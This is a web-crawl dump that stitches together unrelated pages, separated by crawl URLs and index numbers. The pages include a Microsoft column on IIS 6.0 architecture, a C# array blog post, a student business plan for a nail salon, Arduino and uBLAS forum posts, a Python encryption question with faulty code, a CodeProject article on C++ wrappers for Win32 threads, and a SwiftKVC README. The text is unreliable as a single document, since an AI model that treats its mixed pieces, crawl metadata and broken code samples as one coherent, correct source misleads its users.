informed with the latest platform updates, please follow us on Twitter, @StdLibHQ, or if you’re interested in joining the team — we’re hiring! Shoot us an e-mail or resume to careers@stdlib.com.
http://brianyang.com/build-an-emergency-notification-slack-bot-in-10-minutes-with-messagebird-stdlib-and-node-js/
CC-MAIN-2019-04
refinedweb
1,869
74.19
So, I see this type of pattern in a bunch of different places in my code where I use arrays of objects contained in other objects. Often, I want to use a System.Array object, like string [] instead of an ArrayList or other collection for the simplicity, ease of serialization, etc. But, I find myself re-writing code that looks like this do perform the simple task of adding an item on the end of the array: [Serializable]public class WatchListStatus{ private WatchListStatusItem [] m_statusItems; public void AddStatusItem(WatchListStatusItem item) { // Get the length int intLength = (this.m_statusItems == null) ? 0 : this.m_statusItems.Length; WatchListStatusItem [] tmpStatus = WatchListStatusItem[intLength + 1]; // Copy items if needed if(intLength > 0) Array.Copy(this.m_statusItems, tmpStatus, intLength); // Add to the end of the array tmpStatus[intLength] = item; // set the private instance this.m_statusItems = tmpStatus; }} So, here's my question for everyone... Is there a better way? I know I could do something generalized with reflection, but I'm not sure that the payoff would be that great. I guess I'm searching for a static method of the System.Array class that could append an object, but I'm not aware of one. Music tip - Wanna know who's coming to town? Check out Poll
http://codebetter.com/blogs/brendan.tompkins/archive/2003/11/10/3414.aspx
crawl-002
refinedweb
207
56.86
Encapsulating Win32 threads in a C++ class, easy to subclass and reuse. Hide the details of threads from users so they can focus on the project details. Object oriented languages like C++ have their strength in their ability to encapsulate the representation and implementation of an object, so that programming is focused on a higher level. We say we're programming at interface level rather than at function level. However most OSes haven't been design with C++ in mind, they were usually implemented using non-OO approaches. That's why sometimes it can be tricky to encapsulate some platform dependent resources, like threads for instance. My approach covers Win32 threads. To create another thread in the same process, one has in Win32 couple of API functions that handle threads. However they are C and not C++ API. We can easily notice C idioms like callback functions, conversions to and from void* to other types and so on. Let's take a look at how CreateThread, the API function that creates a thread in Win32 looks like. It's prototype it's shown below: HANDLE CreateThread( LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId ); lpStartAddress is a pointer to a callback function that will run in the new thread, and lpParameter is a parameter of type void* passed to the new thread. Passing a pointer to a callback function however it's not in the spirit of OOP, and it comes like a serious impediment if we want to encapsulate threads in classes. The callback function required to be passed to CreateThread looks like this: DWORD WINAPI ThreadProc( LPVOID lpParameter ); We'll notice this prototype will keep us from having this callback function as a member of a class, as it's member functions are passed a hidden parameter: this. What's to be done then? Did we fail miserably? Not yet. We cannot use member function and we've seen why, however classes have static methods, which have single instances for all objects. They are connected to classes rather than to objects. That's why they are not passed this as a parameter. So a static function becomes an interesting candidate for a callback function. However there's one small problem, if we have our thread in a static method, then no matter how many objects of that class we'll have, there will be only one thread, as a static method has a single instance per class. This is not what we want. We want our working thread to be a member method, easy to override by subclasses, and all this workaround to be transparent for the clients. Can we do that? Yes we can. If you look at ThreadProc, you'll notice it can be passed one void* parameter. Nothing prevents us from sending it (void*)this, and in ThreadProc we just call our working method, now that we have this pointer. The code for doing that will look like: //here we create the thread HANDLE CThread::CreateThread () { return ::CreateThread ((NULL, 0, (unsigned long (__stdcall *)(void *))this->runProcess, (void *)this, 0, NULL); } //static method int CThread::runProcess (void* pThis) { return ((CThread*)(pThis))->Process(); } //our working method, virtual, overridable int CThread::Process () { //will work in another thread } So far so good. We managed to provide an encapsulation of threading mechanism, so users will simply have to implement their own Process, and then call CreateThread member function. It's even easier to provide reusability, as a user can simply inherit from our class defined above, CThread, and simply implement Process, and then call CreateThread, and they have a thread simple as that. However there's a small issue to note here: Let's say we have a subclass of CThread, named CMyThread. In CreateThread will convert this (which is of type CMyThread*) to void* and pass it to runProcess, where we reconvert this to CThread. C++ standard states that if you convert a type X* to void*, then only a conversion back, to the same type X* is permitted. Other conversions result in an undefined behaviour. That simply means we've done something wrong. How can we fix that? Well, with a small workaround. struct workAround { CThread* this_thread; }; //we pass a workAround struct instead of this HANDLE CThread::CreateThread () { workAround* wA = new workAround; wa->this_thread = this; return ::CreateThread ((NULL, 0, (unsigned long (__stdcall *)(void *))this->runProcess, (void *)wa, 0, NULL); } //static method int CThread::runProcess (void* pThis) { workAround* wA = (workAround*)pThis; //this will call the appropriate method, as Process is a virtual method CThread* thread = wA->this_thread; delete wA; return thread->Process(); } This time we're allright as we're converting to and from the same type ( struct workAround). Finally to be in the spirit of C++ we'll use C++ conversion, instead of C conversions. Eg: instead of (void*)wA we'll have static_cast<void*>(wA) Due to the fact most nowadays OSes are not object oriented, as a C++ we usually have to find workarounds when we need to encapsulate platform dependent resources. We have to apply different tricks to achieve that, but once we encapsulated it, it's very simple to use and reusable with considerable less effort. Threads in Win32 are a good examples in that direction. You can further study the source code to get a deeper insight. Happy programming! General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/threads/thread_win32.aspx
crawl-002
refinedweb
897
60.24
I have written the following classes to be able to test different encryption schemes. However, I'm having trouble instantiating objects from the different encryption scheme. Could someone point out to something that doesn't make sense that I'm not catching atm? I'm not sure why it doesn't work. It gives a TypeError: encrypt() takes exactly 3 arguments (2 given) class AXU: def __init__(self, sec_param): self.sec_param = sec_param def getHash(self): # sample a, b and return hash function a = random.randrange(self.sec_param) b = random.randrange(self.sec_param) return lambda x : a*x+b % sec_param class BC(object): def __init__(self, sec_param): # generate a key self.sec_param = sec_param def encrypt(self, message, key): #encrypt with AES? cipher = AES.new(key, MODE_CFB, sec_param) msg = iv + cipher.encrypt(message) return msg class tBC(object): def __init__(self, sec_param): self.sec_param = sec_param def encrypt(self, tweak, message): #pass return AES.new(message, tweak) class Trivial(tBC): def __init__(self): self.bcs = {} def encrypt(self, tweak, message): if tweak not in self.bcs.keys(): bc = BC() self.bcs[tweak] = bc return self.bcs[tweak].encrypt(message) class Our(tBC): def __init__(self, sec_param): self.bc1 = BC(sec_param) self.bc2 = BC(sec_param) self.bc3 = BC(sec_param) self.bc4 = BC(sec_param) # encryption over GF field def encrypt(self, tweak, message): return self.bc1.encrypt(self.bc2.encrypt(tweak) * self.bc3.encrypt(message) + self.bc4.encrypt(tweak)) message_instance = 'This is a message to the board of directors.' tweak = os.urandom(16) #16 bytes=128 bits our_encr = Our(256) our_encr.encrypt(message_instance, tweak) You are passing in one argument to a bound method: return self.bc1.encrypt( self.bc2.encrypt(tweak) * self.bc3.encrypt(message) + self.bc4.encrypt(tweak)) That's one argument to the BC.encrypt() method each, and this method takes 2 beyond self, message and key. Either pass in a value for key, or remove that argument from the BC.encrypt() method definition (and get the key from some place else; perhaps from an instance attribute set in __init__).
https://codedump.io/share/tkWhT57ewflI/1/instances-amp-classes-requiring-x-arguments-when-x-1-given
CC-MAIN-2016-50
refinedweb
338
53.88
void setup() { } void loop () { } int main() {return 0;} #include "WString.h"int main(void) { String bloat = "hello world"; return 0;} /opt/avr-gcc/bin/avr-size build/test.elf text data bss dec hex filename 10194 20 5 10219 27eb build/test.elfCan. Binary sketch size: 1,574 bytes (of a 32,256 byte maximum). My intent on starting this thread was / is two fold. One, too (is that the correct to??) discover how to have just the needed code included in the final executable and two, to be sure that there are no hidden delays / waits anywhere. If the size of the final binary is a problem, one solution to gain 2kb is to flash it to the Atmega using ICSP, thus overwriting the bootloader. Quote from: AlxDroidDev on Apr 03, 2013, 06:12 pmIf the size of the final binary is a problem, one solution to gain 2kb is to flash it to the Atmega using ICSP, thus overwriting the bootloader.Every board since the first uno has had a 512 byte bootloader, so you'd only save that much. Please enter a valid email to subscribe We need to confirm your email address. To complete the subscription, please click the link in the Thank you for subscribing! Arduino via Egeo 16 Torino, 10131 Italy
http://forum.arduino.cc/index.php?topic=157973.msg1183520
CC-MAIN-2015-48
refinedweb
217
72.76
Subject: Re: [ublas] [bindings] matrix traits From: Rutger ter Borg (rutger_at_[hidden]) Date: 2009-01-15 14:43:03 Karl Meerbergen wrote: > > These are merely things like typename MatrA::value_type which is > replaced by matrix_traits<MatrA>::value_type, e.g. Since we use ublas > containers in the regression tests, such type of error is not uncovered. > With respect to the traits systems, to get a binding working, I have to add the following includes: #include <boost/numeric/bindings/traits/type.hpp> #include <boost/numeric/bindings/traits/traits.hpp> #include <boost/numeric/bindings/traits/type_traits.hpp> Is this the recommended way to get access to all goods needed for bindings? It could be me, but the similar nature of the naming of these three get me confused as to what these files are supposed to do and/or include. Cheers, Rutger
https://lists.boost.org/MailArchives/ublas/2009/01/3221.php
CC-MAIN-2020-29
refinedweb
139
54.93
Extention nail salons are now a thriving market Published: Last Edited: This essay has been submitted by a student. This is not an example of the work written by our professional essay writers. In October 2004, Nails magazine conduct a survey and learnt that 87% of women have had their nails done at a salon (2). The magazine also stated that 42 % of the respondents have their nails done at least once a month and Nail-only salons are the preferred choice over full- service salons or spas for nail care (1). Almost all women go to nail salons in order to look good. Nicer Nails salon is a beauty service establishment that supply a personal service to predominantly female clientele. The salon offer nail care like pedicures, manicures as well as nail enhancements which involve applying false nails, nail extensions, and decorating fingernails according to requirements including nail parties. We are knowledgeable about hygiene and health issues relating to their profession. The desire to have beautiful nails first began during the Ming Dynasty of China, long artificial nails were worn by noblewomen as a status symbol indicating that, unlike commoners, and they did not do manual labour. In the early 19th century in Greece, the upper class women wore empty pistachio shells over their nails, then slowly spreading the artificial nails trend across Europe. In the late 20th century, artificial nails for women became widely popular all over the world (4). The fascination with beautiful nails has grown over the centuries and become a multi-billion pound industry. Extension nail is now a thriving market. Exploiting the development of technological and procedural advancements, Nicer Nail salon will provide a full-service nail technician with high customer satisfaction by delivering speedy, excellent service, an enjoyable atmosphere at an acceptable price. The demand for nail technician service is growing since women have increasing the disposable income which they are keen to spend on treatments that will reduce the stress of everyday life. At Nicer Nail salon, our high qualified technicians will offer a comfortable and relaxed environment. We are the true cut above other nail shops. Our mission is to supply services that enhance our clients' physical appearance and mental relaxation. The timing is right for starting new venture; one perfect location was found in Kingston shopping centre. To achieve our objectives, Nicer Nail salon is seeking £40,000 in loan financing. This loan will be paid from the cash flow from the business and will be secured by the assets of the company. Table of Contents 1.0 Introduction Beauty industry in the U.K is booming, there is a lot of money to be made in this industry more than ever, making today a great time to join the industry. Salons and spas have become a cure to the fast-paced lifestyles nowadays. It has been estimated that the average person spends one third of her cosmetic budget on nail care. Because today's fashion regards professional nail care services increasingly important. However, this billion pound industry can be influenced by changing in politics and economic. The report will show how important it is for business to react with the change of environment. This report is not only an environmental analysis that supports the nail salon but also a financial plan to help the prospect of opening Nicer Nail Salon. Product & service: 2.1 Target customer: female over 16 year olds. According to the Nail magazine, nail salon patrons begins their habit early. 55% were under 25s when they first starting having their nails done professionally (1). Moreover, result from 2010 Survey of Hours and Earnings show Women salary is highest in the age group within 30-39 (12). On the other hand, nails art parties are on the rise in popularity, particularly for hen nights and teenage parties. Therefore, the need to offer an array of services to attract clienteles of all different age and income groups is necessary. For example, high-end clients are looking to be pampered. Although we cannot ignore the segment of customers, who would still want to have their nails done, don't want to spend out of their comfort areas. Services: Principally, the salon will generate revenues from the direct nail technician services. A nail technician provides painting, nail filing, manicure, pedicure and artificial nails services including acrylics, airbrush nails and nail jewelry. The most popular new foot service which is gel toenails also be provided. To a lesser extent, the salon generates revenue from sale of nail care and hand cream products. Furthermore, a deluxe service involves playing around with colored gels and dabbling in 3-D art will also be offered. Location: the salon will be located on Fife Road, Kingston -upon-Thames, U.K. the location is strategically situated on one of the busiest street in Kingston next to a hairdresser; importantly, there is a big car park nearby the salon. This is a high profile area and easy access from all parts of the town. It is also very convenience for clienteles to locate our salon. Pricing: According to nail magazine survey, 11% of respondents have stopped having their nails done at a salon due to the expense (3). Thus it is important to offer service that available for customers who can't quite afford high-end luxury salons. After sales service: our customers will leave with tips on how to make their nails healthier. To gain the clienteles trust, clean and safe quality products are used. In addition, clients are always welcome to question about our products. We are confident that word-of-mouth about such a salon would be the best advertising for this type of business, it is not only attract local clienteles but also reach customers far outside the boundaries of Kingston. A creative and innovative fashion always applies to generate very high levels of customer satisfaction. Providing customers with the option of booking appointments and consultations online. 3.0 The Business environment (PESTLE analysis): Like any other business, the Nail salon has to act and react to external factors influences it. Since markets are changing all the time. Customer develops new needs and wants, new competitors enter a market, new technology means that new product can be made. Government introduces new legislation e.g. increase minimum wage means that the disposable income increase it may lead to higher level professional service. Therefore, it is essential to know the influence of external factors include political, economical, socio-cultural, technological, legal and ethical environment is (13). The political environment: is one of the most important factors affecting the operation of a business. It is part of the macro-environment which is external to an organisation and completely beyond its control. The effect of political on business in general: Politic affect business in varieties of levels. Business is affected directly by tax policy; high tax rate will attract less investor (chart 8 in appendix1). Policies of government are very important. For example UK is the democratic country, people have full voting authority; they would be able to choose government that would work for the betterment of the country. It helps businesses to thrive because of the good policies of the government. In contrast, if there is no democracy, there is no respect for the chosen government. Instability and uncertainty in the country arise, government comes and goes and so will their respective decisions and policies. Business will suffer in such case as they do not know what will be their future. An example of instability political causes negatively influencing is the effects of anti-government protestors on hotel operators in Thailand in December 2008. Chart 9 (Appendix1) shows a loss of room revenue during period of peak tourist season. It is clear that the political instability is negatively influences travelers' decision making (7). Furthermore, a stable political situation will attract more and more investors from other nations. The effect of the political environment on nail salon: Tax policy: as a sole trader Nicer Nail salon owner has responsibility to pay for local business tax, VAT, corporation capital income tax for business and national insurance for employees. Because by doing so the government know the presence of the business. The conservative government recently announced a new "austerity plan". It causes higher interest rates, more business failures, lead to shaper rise in unemployment, directly affect the bank and national disposable income. As a result, the salon revenue may reduce significantly. Economical environment : It is believed that the level of demand for nail treatments can change depending on consumers' level of disposable income. Businesses are in areas hard-hit economically will suffer because people lost jobs they have to tighten their belts and take control of their spending habits. Since many people are of the opinion that having nails done is not a necessitate thing. As a service industry, many beauty salons are being hit severely. Retail Sale is another example of industry that suffers when the surrounding economy turns down. Chart 11 (appendix 1) shows a lot of retailers report losses and in fact go out of business. Fortunately, the economy in the UK is in fast recovery (Chart 5 appendix 1). Additionally, chart 6 (Appendix 1) show household expenditure and total employment rose (5). Increasing in disposable income means that people can spend on luxuries like nail treatments. Furthermore, The British Lifestyles report by research group Mintel found that in the last decade we have spent 50% more on trips to hairdressing and beauty salons. This proves that the beauty market increases continuously despite the fact that the economic market condition in the UK is still in recession. Regardless of the recession, there are still people who enjoy being pampered. It makes professional nail care is a business with many good advantages. Socio-cultural environment: Every business works in society and consequently is subject to a variety of social influences. These influences include demography, social class and culture (13). For example, result from 2010 Survey of Hours and Earnings (chart 10 appendix 1) show that median earning of female employees grew. Increasing number of career women trends developing a "high maintenance" notion towards beauty regimes. This is reflected in the increasing amount of nail bars and services available. Nicer Nail Salon is the place where hard working people can come to get away from their daily stresses and be truly spoilt, a place that had the look and feel of a posh city salon. Nail arts can be a fashion statement and express individual for young clienteles who follow the latest trends and styles with a desire to be fashionable. Other services such as ear piercing, facial, and waxing eyelashes treatments are also offered to attract new clients. On the other hand, UK population is ageing (chart 4 Appendix I), ageing population means that the need to provide for a wider age range of clients is essential. Nodaway, Women earn more they will spend more money to look good. Plus the influence of fashion and changes in attitude toward health make professional nail care become booming industry. Technological environment: Advances in technology can have a major impact on business success. For example, one of the easiest and quickest way to let high-end class clienteles know that the salon are dedicated to serving them with luxurious pampering is creating a website that speaks to their needs and wants. Since, today the internet has major influence on the way consumers' research and purchase products. By registering the nail salon with online portals the potential customers can easily reach the salon website which provide company name and contact information with online directories. Furthermore, option of consultants online 24/7 shows the salon is dedicated to deliver professional service. Moreover, electric nail file, unlike manual tool, enables a nail technician to filling acrylic nails much easier since the areas that were once hard to reach when filing manually such as cuticle areas and undersides of nails are now easily accessible. The electric nail drill is a time saver; it allows the salon to serve more clients in a day and this should increase profit. In 2010, 19.2 million households had an Internet connection in the U.K. This represented 73 per cent of households and an increase of 0.9 million since 2009 (15) an enormous increase in the number of home computer. This makes internet becomes one of the best ways to advertise the salon. On the other hand, improvements in technology will reduce the costs of nails equipment and products for example nail varnishes, jewellery. This should increase salon revenue. The legal environment Health and safety is important when working as a nail technician. Health and safety legislation is part of criminal law. Failure to comply with the law has serious consequence for example if there is a severe risk to health and safety, the salon will be closed down until improvements have been made. The salon has to work within the legal and professional frameworks that set the standards for employment. The law demands that every place of work is a healthy and safe for clients, workers, and other visitors. For example, potentially hazardous substances like glues or acetones should be carefully handle. The salon must follow the Control of Substances Hazardous to Health Regulations 2002 (COSHH) (10). My salon also looks forward to Legal requirement such as accident insurance and safety disposable products. The salon will keep to the "Health and Safety" guidance produced by Habia for nail technicians (9). This involves controlling and minimizing skin exposure to nail products, disinfecting equipment for manicuring, cleaning and minimizing inhalation exposure to nail products A nail technician should provide a service with reasonable care and skill, within a reasonable space of time and at a reasonable charge (The Supply of Goods and Services Act 1982). The nail technician will commit a criminal offence if published misleading advertising that deceives another trader (The Business Protection from Misleading Regulations 2008). Hence, it is crucial to know about the laws. Ethnical environment: Methyl methacrylate (MMA) is a monomer used in nail enhancement application but it should not be used in the salon due to its dangerous effect such as blister and nail loss for natural nails or respiration problem and asthma for some people even though it is still legal to use in the UK. Acrylic contaminated materials should be sealed in a bag before disposal in the bin reducing the amount of chemicals in the air. Gauze pads, cotton wool etc. that have been soaked in chemical should be disposed of in a sealed bag. The intended legal entity for my company: The salon operates as sole trader. I have look and found that being a sole trader is the easiest way to start a small business like a nail spa. Accounting is much easier hence bills for accountants are lower. Plus no complicated paperwork is required. Importantly, decision can be make quickly and close contact can be kept with clients and employees. However, you have to make decisions and provide all finance by yourself. The business income is the owner income therefore it is harder to reduce tax bill. Registration and regulation: Nail technicians are required to register their business and apply for a license to trade. The licence is known as a "special treatment licence". The fee to register will depend on each local authority. As a Sole Trader, the salon owner needs to register with Her Majesty's Revenue and Custom (HMRC) as self-employed at the moment the business has started otherwise the financial penalty will be charged. Financial plan The startup capital of £45,000 (appendix II for details) is required to use for the design, leasehold improvement, and equipment of the salon. There are many ways to raise finance for examples borrow from family, get a bank loan or from outside investors. I did research and found that the best way to raise capital for Nicer Nail Salon is borrowing from my parent because they provide with better terms than the bank or private loan guarantees. In order to have successful business with family an agreement letter (Appendix II for details) between me and my parent is necessary in case thing don't go as planned. This also helps to protect everyone from each other and eliminate all conversations that start with "you never said that". This note emphasizes that my parent lend me £45,000 as a debt loan rather than equity. The interest will be paid quarterly to my parent account. Borrowing from parent is better than borrowing from private loan guarantees as the limit time frame stems is much longer. Compare to bank term loans, the interest rate is also much lower. Conclusion: Based on the result from 2010 Survey of Hours and Earnings and British lifestyles I can conclude that Nicer Nail Salon is a necessary service nowadays. Owning a nail salon is promising as little start-up cost is needed and importantly, it is never out of season. , it will be a good start of going somewhere with nail business. Explain in greater details of executive summary how and why the conclusions were reached. This is based on result of findings Appendix I: Table 1: shows the places where customers have their nails done. Table 2 shows how often they have their nails done Table 3: show the main reason stop customers having their nails done at a salon Chart 4: Estimated and projected population and percentage of population by age group, UK, 1984, 2009 and 2034 (3) Chart 5: show the economy from 2006 to 2010 (2) Economy grows by 0.7% in Q3 2010 Real GDP quarterly growth Chart 6: show consumer Spending trend from 2006 to 2010 Household expenditure grows by 0.3% in Q3 2010 This is a graph showing Household final consumption expenditure - percentage change, quarter on previous quarter Household final consumption expenditure - percentage change, quarter on previous quarter Chart 7: GDP and the Labour Market (5) From recession to recovery Chart: The labour market in recession and recovery The labour market in recession and recovery The UK continues its path of recovery from recession(5) = The UK economy over the past three recessions According to the latest figures, UK GDP grew by 0.7 per cent in quarter three 2010. GDP grew by 0.7 per cent in quarter three 2010. This was the fourth consecutive increase since the end of the recent recession. The 0.7 per cent growth stemmed from: Service sector (0.4 per cent) Construction sector (0.2 per cent) Production sector (0.1 per cent) Growth in the Service sector was driven by the 'government and other services', 'transport storage and communication' and 'distribution hotels and restaurants' Chart 8: Higher tax rates discourage investment by lowering investment's return (6) Chart 9: Daily hotel reservation requests in Thailand from 16/10/2008 to 16/12/2008(7) Chart10: Earnings 2010 survey of Hours and earnings (12) This is a graph showing Growth in median gross weekly earnings of full-time employees by sex, United Kingdom Chart 11:UK Retail Sales during recession Appendix II: Below is the summary of money needed to start up Nicer Nail Salon Start-up Expenses Rent deposit £1,500 Legal £500 Brochures £500 Stationery £1,000 Sundry salon equipment £2,500 Total Start-up Expenses £6,000 Start-up Assets Needed Cash Balance on Starting Date £15,000 Other Current Assets £24,000 Total Assets £39,000 Total Requirements £45,000 This is an installment promissory note between me and my parent Instalment Promissory Note (17) Full Names ____Kim Anh Tran_____ Address___Kingston -upon- Thames , UK, KT2 7SB (Hereinafter referred to as the Borrower/s) Full Names ____Kim Pham____________________________ Address: Kingston -upon- Thames , UK, KT2 7SB (Hereinafter referred to as the Lender) For value received, the Borrower hereby unconditionally promises to pay to the order of Lender the sum of __£45,000 together with interest accrued at the rate of __ten six_percent (_6%) per year on any unpaid balance. Payment Terms Borrower will pay ______one__payment of __£2,000___each at uninterrupted quarterly intervals on the __first day of each month, starting on the 11/01/2011 until the Principal amount and accrued interest is paid in full. All payments shall first be applied to outstanding late fees, then to interest and the balance to the Principal amount. Prepayment The Borrower may prepay this Note in full or in part at any time without premium or penalty. All prepayments shall first be applied to outstanding late fees, then to accrued interest and thereafter to the principal loan amount. Place of Payment Payment shall be made at the above stated address of the Lender or at such place as may be designated from time to time in writing by the Lender or holder of this Note. For ease of payment the Borrower may exercise the option to effect payment by direct deposit or electronic transfer of funds into the account of Lender as specified in writing. Late Payment Fees If payment is not made within _10___ days as stipulated in the payment terms the Borrower shall pay an additional late fee in the amount of £__500. Acceleration of Debt upon Default If the Borrower fails to make any payment when due for whatever reason and the Lender provides notice of such failure, the Borrower must effect payment of the amount due within __30__ days, failing which the Lender can demand immediate payment of the entire outstanding Principal amount and accrued interest. Collection Fees In the event of default this Note may be turned over for collection and the Borrower agrees to pay all reasonable legal fees, collection and enforcement charges to the extent permissible by law, in addition to other amounts due. Security This Note is secured by a Security Agreement which will remain in full force and effect until this Note and the Security Agreement are released in writing by the Lender. Transfer The Lender may transfer this Note to another holder without notice to the Borrower and the Borrower agrees to remain bound to any subsequent holder of this Note under the terms of this Note. equally liable for the repayment of the debt described in this Note. Borrower's Waiver The Borrower waives demand and presentment for payment, notice of non-payment, off-set, protest and notice of protest and agrees to remain fully bound until this Note is paid in full. Lender's Indulgence No relaxation, indulgence, waiver, release or concession of any terms of this Note by the Lender on one occasion shall be binding unless in writing and if granted shall not be applicable to any other or future occasion. Binding Effect The terms of this Note shall be binding upon the Borrower's successors and shall accrue to the benefit and be enforceable by the Lender and his/her successors, legal representatives and assigns. Jurisdiction This Note shall be construed, interpreted and governed in accordance with the laws of the U.K and should any provision of this Note be judged by an appropriate court of law as invalid, it shall not affect any of the remaining provisions whatsoever. General Where appropriate words signifying one gender shall include the others and words signifying the singular shall include the plural and vice versa. Paragraph headings are for convenience of reference only and are not intended to have any effect in the interpretation or determining of rights or obligations under this Note. Signed on 10/01/2011 (1) Borrowers Name ___Kim Anh Tran__________________________ (2) Lender Name _____Kim Pham________________________
https://www.ukessays.com/essays/economics/extension-nail-salons-are-now-a-thriving-market-economics-essay.php
CC-MAIN-2017-09
refinedweb
3,939
50.97
Professor Windows - November 2003 Introducing the New Internet Information Services (IIS) Reviewed By: Ziv Eden, Software Test Engineer, Microsoft Israel While in some areas Windows Server 2003 is an incremental release compared to Windows 2000, it certainly has a significantly different Web and application server infrastructure than previous releases of Windows Server. IIS 6.0 that comes with Windows Server 2003 is built for increased capacity and scalability for Web applications, and more possibilities of decreasing the number of web servers. There are many new features in this baby, but first thing's first – you've got to get to know the architecture before running and selecting those cool new tabs. A Totally New Architecture When you look at IIS 5.0, it was essentially designed to have only one process, namely InetInfo.exe. This was your Web server process that handled requests to one or more out-of-process applications, namely DLLHost.exe. In other words, in previous versions of IIS, a failure of a single Web application could cause the failure of other Web sites and applications on the same server. In IIS 6.0 we built the architecture in a way that the Web server code runs separately from the application handling code. There are three new components in IIS 6.0: - Kernel-mode HTTP listener (HTTP.sys) - User-mode configuration and process manager (WWW Service Administration and Monitoring) - Worker processes (the application handlers) Worker processes are "Mini Web Servers" that operate independently of one another (so in case a worker process fails, it does not affect the other worker processes). Every worker process handles service requests for application pools in HTTP.sys. Application Pools help isolate Web sites and applications into self-contained units. They are separated from the other applications hosted on the same server. In short, any user code such as ASP pages is processed in the worker process(es) and not in kernel-mode. Figure 1 helps with the new architectural picture. If your browser does not support inline frames, click here to view on a separate page. Figure 1 IIS 6.0 Architecture Application Pools are another new concept in IIS 6.0. They are used to isolate between Web sites and applications so certain groups of URLs can share certain configuration that is different than other URLs. In an application pool, a worker process services requests for the Web sites and applications that reside in that application pool. Application pools can help you achieve a highly isolated and reliable environment. You can place few web sites in an application pool, and you can place each and every site in its own application pool. To achieve greater security, you can configure a unique user account to be used as the process identity for each application pool. It's recommended that you use an account with the least privileges possible (e.g. Network Service). It's also highly recommended that you separate test applications from production applications into different Application Pools when running on the same server. In The New World, Not Only Cans Get Recycled Recycling is good for our planet, and it's also good for our web servers. One of the most important features of Application pools is that they allow you to periodically recycle (restart) their worker processes based on settings such as memory use, number of requests, etc. The process recycling helps in preventing resource leaks and other possible issues that may occur in applications when running for a long period of time. When a worker process is ready to be shut down, a new worker process is created. The queued requests are sent to the new process and the old process is drained of requests before being shut down, making the recycle process fairly transparent to an end user. You can throttle resources such as bandwidth, connections, and CPU use. Secure By Default One of the most important changes made to IIS 6.0 is that it's locked down by Default. In previous versions of IIS, web application processes ran as Local System. Local System has access to almost every resource available on the machine, and needless to say, this was very challenging to give you highly secured site with such privileges. In IIS 6.0 the identity of an application pool is configurable, and defaults to the Network Service account, which has low-level user access rights. But listen to me talking about running your web server securely. Fact is, Windows Server 2003 does not even install IIS 6.0 by default — you'd have to select and install it specifically, and even when installed, it essentially does nothing much than displaying HTML text and graphics (static files). To operate freely with dynamic content, you have to go and manually enable specific items for your web server such as ISAPIs. This step was done in order to reduce the attack surface. You can now also remove IIS from any desired machine on your network by using GPO (Group Policies). Always keep in mind that all these and more secure defaults and settings will not offer a completely secure and threat-free web server without downloading and installing patches when needed. Windows Server 2003 includes automatic updates that can automatically make sure that server stays patched for security threats. There are more ways (such as Software Update Services, Systems Management Server, etc.) to enable automatic patching of servers and other Windows machines in your network. For more information, you may start by referring to this page. Notepad style Configuration Editing Remember the good old metabase.bin file that held the IIS configuration? Well, it's still there, essentially, and locked by InetInfo, but actually, in IIS 6.0, the configuration file is now stored in XML format that you can edit with any standard text editor. Some call it "Notepad style editing" meaning you essentially open notepad and edit the application settings while your web server is running without needing to restart or do anything else. No more disruption of service just to change a configuration setting on one of your web sites, or create virtual directories or even add new sites. IIS 6.0 will automatically track the changes in the configuration metabase that were written to disk. In addition, your previous configurations are saved so you may rollback to previous configurations if needed. Management Goes To The Next Level Some of you who are into scripting might know what Windows Management Instrumentation (WMI) is and how powerful it is as a means of configuring servers and gaining access to important system management data. For those of you who are into using WMI, IIS 6.0 now offers full support for WMI, providing you with a rich set of programming interfaces that offer flexible ways to manage your Web Servers. But not all of us are into scripting, right? True, we're not all "script gurus", yet we all want quick "cmd style" management, don't we? When administrating an IIS 6.0 box or multiple IIS 6.0 Web Servers, you can use the Windows Server 2003 command line to accomplish many common management tasks. You can manage multiple local or remote computers and automate tasks in a single command line. One of the highly noted VBS scripts that exist is IIScnfg.vbs, which enables you to export Web site and server configurations and import them to a different server. You can also directly copy a single site, all sites, or the entire configuration to another server. In addition to the new cmd and WMI interfaces, we've kept backward compatibility to IIS ADSI namespace provider and ABO (Admin Based Objects) so existing scripts you've written using ABO/ADSI won't break when moving to IIS 6.0. More To Be Told (And Seen!) Not only did Microsoft re-write IIS in Windows Server 2003, but we also offer Windows Server 2003 Web Edition which is an economical Web server that is competitively priced for self-hosting organizations needing to deploy Web pages, Web sites, Web applications, and Web services rapidly. IIS 6.0 really made a huge leap, in which this column cannot cover the full complexity and richness of the new Web Server. There are many FTP improvements such as FTP user isolation, important performance improvements (e.g. Kernel-mode Caching and ASP caching), new options for limiting how authentication credentials are delegated in Web applications (delegating credentials for specific servers or services), and much more. I could probably go on and talk about SSL improvements, Passport integration, IIS 5.0 compatibility mode, ISAPI improvements, etc., but the bottom line remains - it's a new and robust version of IIS. Therefore, if you're into web hosting – Take this cool technology for a ride! May the source be with you. For More Information - Windows 2003 Internet Information Services Resources - Internet Information Services Technical Articles - Overview of Windows Server 2003 Web Edition - IIS 6.0 Resource Kit Tools For any feedback regarding the content of this column, please write to Microsoft TechNet. Please be aware that a response is not guaranteed.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-xp/bb878068(v=technet.10)
CC-MAIN-2018-17
refinedweb
1,519
53.81
README SwiftKVC SwiftKVC brings key-value coding to native Swift classes and structures. You can easily set and access properties just using a subscript: var person = Person() person["name"] = "John" Or use the more verbose method to catch potential errors: var person = Person() do { try person.set(value: "John", key: "name") } catch { print(error) } SwiftKVC brings the power of Cocoa style key-value coding to Swift. Installation SwiftKVC is available through CocoaPods. To install, simply include the following lines in your podfile: use_frameworks! pod 'SwiftKVC' Be sure to import the module at the top of your .swift files: import SwiftKVC Alternatively, clone this repo or download it as a zip and include the classes in your project. Usage To enable key-value coding for a native Swift structure or class, simply have it conform to either Value or Object respectively: struct Person : Value { var name: String var age: Int } You can then set and retrieve values from your model by key: person["name"] = "John" person["age"] = 36 if let id = person["id"] as? Int { print(id) } If you would like to handle possible errors, you can use the more verbose methods: do { try person.set(value: "John", key: "name") try person.set(value: 36, key: "age") if let id = try person.get(key: "id") as? Int { print(id) } } catch { print(error) } Author Brad Hilton, [email protected] License SwiftKVC is available under the MIT license. See the LICENSE file for more info. *Note that all licence references and agreements mentioned in the SwiftKVC README section above are relevant to that project's source code only.
https://swift.libhunt.com/swiftkvc-alternatives
CC-MAIN-2022-40
refinedweb
264
63.39
